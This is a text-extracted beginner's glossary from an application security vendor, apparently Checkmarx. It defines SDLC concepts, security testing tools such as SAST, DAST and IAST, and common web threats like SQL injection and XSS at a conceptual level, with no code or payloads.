Application Security Guide for Beginners.

INTRODUCTION

This beginner’s guide to applicationsecurity focuses on the main conceptsand keywords used in the ApplicationSecurity domain.

This guide is divided into the followingcategories:

Code

2

Application SecuritySolutions

Code DevelopmentMethodologies

Common threats and their impacts

WHAT IS SDLC?

Most organizations develop applicationsaccording to a clear process by which eachapplication is designed, developed, tested,and deployed. This sequence is called thesoftware development lifecycle, orSDLC.

SDLCshapes the way applications are builtand defines the processes and milestonesan application needs to pass before goingto the next stage of development.

WHATISASECURESDLC?

Secure SDLC is a process where securitytouch points are added to each stage ofthe SDLC.SecureSDLCapplies security bestpractices to ensure that applications aresecure upon release while fitting into anydeveloper’scontinuousintegrationworkflow.

Secure SDLCProcess

1 32

Risk Assessment

ThreatModeling & DesignReview

Static Analysis

SecurityTesting & CodeReview

Security Assessment& SecureConfiguration

4 5

SDLC Process

1 32 4 5

Requirements

Design

Development

Testing

Deployment

3 5

STATIC APPLICATION SECURITY TESTING WITH SECURE SDLC

Static Applications Security Testing (SAST)is one of the driving forces behind thesecure SDLC. SAST empowers developersto deliver secure applications by seamlesslyintegrating with their developmentprocesses andenvironments.

In a secure SDLC, SAST solutions detectvulnerabilities which may expose theapplication to security risks and breaches.

6 7

SAST Integration Points

<CODE DEVELOPMENT METHODOLOGIES/>

Process for planning, creating, testing and deploying anapplication.

Software Development Life Cycle (SDLC)

Alternative to traditional project managementwhere the emphasis is placed on empoweringpeople to collaborate and make teamdecisions in addition to continuous planning,testing andintegration.

AGILE Model

10 11

Sequential design process, used in softwaredevelopment processes, in which progress isseen as flowing steadily downwards (like awaterfall) through the phasesof requirement,design, development andtesting.

Waterfall Model

Development method that uses minimalplanning in favor of rapid prototyping. Aprototype is equivalent to a component oftheproduct.

Rapid Application Development (RAD)

12 13

<CODE/>

Collectionof sourcecodethat isusedto builda particular software system, application orsoftwarecomponent.

Codebase (or code base)

Frameworksare fairly large pre-madepiecesof code. Thedevelopers write their code ontop of the framework.

Notableexamples:Struts

Telerik

GWT

Frameworks

16 17

Atool designed to automate the process ofprogram compilation. Build systems comein various forms and are used for a varietyof software buildtasks.

Notableexamples:

Jenkins

AnthillPro

Build Systems(or Build Server, Build Automation)

File archive or web hosting facility wherelarge amounts of software source code arekept either publicly or privately.Archived files may also beversioned.

Notable examples:

Source Code Repository

18 19

TFS

GIT

Perforce

SVN

Software application that keeps track of reported bugs, issues or tasks ina project.

Notableexamples:

TFSJira

HP-QC

Bug Tracking Systems(Issue Tracking Systems)

Modern interpretation of service-orientedarchitectures used to build distributedsoftware systems. Processes that communicatewith each other over the network in order tofulfill atask.

Example: Microservices can be found inFacebook or LinkedIn; someparts of the GUIhavedowntimefor updatesandsomedon’t.

Micro Services

20 21

The artifact created after compiling andbuilding source code for C++ and otherMicrosoft coding languages.

DLL (Dynamic Link Library)

The artifact created after compiling andbuilding source code for Java codinglanguage.

JAR (Java Archive)

22 23

Development is built around predefinedcode test cases. This means that only afterthe test cases have been created, thedevelopers can start writing the code.

Test Driven Development(TDD)

24

<APPLICATION SECURITY

SOLUTIONS/>

Security testing which analyzes anapplications source code or binary codeto determine if securityvulnerabilitiesexist.

SAST solutions analyze the application‘from the inside-out’, in many cases SASTsolutions do need compiledcode.

Static Application Security Testing (SAST)

Security experts trying to find and exploitvulnerabilities that an attacker coulduse. The testing is done with or withoutdedicated hackingtools.

Penetration Testing(AKA Pen Testing)

28 29

Detect conditions of a security vulnerabilityin an application in its running state.Dynamic Application Security testinggenerates automated attacks which maybe used by realattackers.

Dynamic Application Security Testing (DAST)

Security technology that is built or linkedinto an application or application runtimeenvironment and is capable of detectingand preventing real-timeattacks.

Runtime Application Self-Protection (RASP)

30 31

List of software weakness. List is created by community cooperation.

Software weaknesses are errors that can lead to software vulnerabilities.

Common Weakness Enumeration (CWE)

A publicly available and free to use listor dictionary of standardized identifiersfor common computer vulnerabilitiesand exposures.

Common Vulnerabilities and Exposures (CVE)

32 33

Community which creates freely-availablemethodologies, tools, standards andtechnologies in the field of applicationsecurity.

Open Web Application Security Project (OWASP)

Combines elements of SAST and DASTsimultaneously. It is typically implementedas an agent within the test runtimeapplication or environment that observesattacks and identifiesvulnerabilities.

IAST determines whether a vulnerabilityis exploitable with increased accuracy,and can identify where specifically thevulnerability is located in the code.

Interactive Application Security Testing (IAST)

34 35

When a security scanner indicates thata vulnerability exists (for example, SQLInjection), while in reality it doesn’t exist.

False Positive

When a vulnerability exists and the securityscanner doesn’t detect it. Therefore theuser isnot notified about the vulnerability.

False Negative

36 37

Protects web applications by monitoringand controlling its input and output and theaccess to and from the application.

Running as an appliance, server plug-inor cloud-based service, a WAF inspectsmonitors, filters or blocks malicious trafficto and from a Webapplication.

Web Application Firewall(WAF)

BinaryAnalysis isa formof StaticApplicationSecurity testing based on analysis of acompiled code-base rather than the rawsource code. Abinary is a machine readablefile which can be executed and run.

Binary Analysis

38 39

Agreement offered by many websites andsoftware development companies by whichindividuals can receive recognition andcompensation for reporting bugs, exploitsandvulnerabilities.

Bug Bounty Program

Security practice where after the code iswritten it issent to securityexpert to undergoinspection after which the developer needsto alter the code accordingly.

Security Gate

40 41

<COMMON THREATS AND

THEIR IMPACTS />OWASP TOP 6

THREAT:Code injection technique used to attackdata-driven applications, in whichmalicious SQLfragment are inserted intoan entry field for execution.

SQL Injection

IMPACT:

May reflect sensitive information, plant information or damage data

May be used to reveal customer’scredit card numbers or any otherpersonal data stored on the DB

Attacker could change system administrator credentials for the databaseserver

Can affect public image of the company resulting in profit loss

44 45

THREAT:Vulnerability typically found in webapplications enabling attackers to injectclient-side scripts into web pages viewedby other users.

Cross Site Scripting(XSS)

IMPACT:

May gain access touser’s identity and act on their behalf

Ability to spread web worms or Trojans

Possible business impact ofpublic exposure about vulnerability

Attacker may gain access to all the end-user information kept on the Client Server (cookies, session IDand Client identity)

46 47

THREAT:Attacker uses multiple transparent layersto trick a user into clicking on a buttonor link that is not the originally intendedtarget area. Therefore, the attacker isrerouting (hijacking) the user to anotherpage, likely owned by another application.Keystrokes can also be hijacked using thesamemethod.

Clickjacking(UI redress attack)

IMPACT:

Can be used to utilize the computer's microphone andcamera

May activate print screen to capture sensitive information

48 49

THREAT:Attack that forces an end user to executeunwanted actions on a web applicationin which they're currently authenticated.Inherits the identity and privileges of thevictim to perform an undesired functionon the victim'sbehalf.

Cross Site Request Forgery (CSRF)

IMPACT:

If the victim is an administrative account, can be used to force the user to perform state changing requests like transferring funds, changing their email address, and soforth.

Can compromise the entireweb application

50 51

THREAT:Exploit which allows attackers to accessrestricted directories and executecommands outside of the web server'sintended directory.

Path Traversal(Directory Traversal)

IMPACT:

Can be used to access to restricted areas and files causing a critical information leak

52 53

THREAT:Vulnerability that permits an attackerto hijack a valid user session. The attackexplores a limitation in the way theweb application manages the sessionID and specifically the vulnerable webapplication.

Session Fixation(dot-dot-slash)

IMPACT:

Can be used to hijack the user-validated session by utilizing the knowledge of thesession ID

54 55

www.checkmarx.com

Thanks for reading! Learn more at: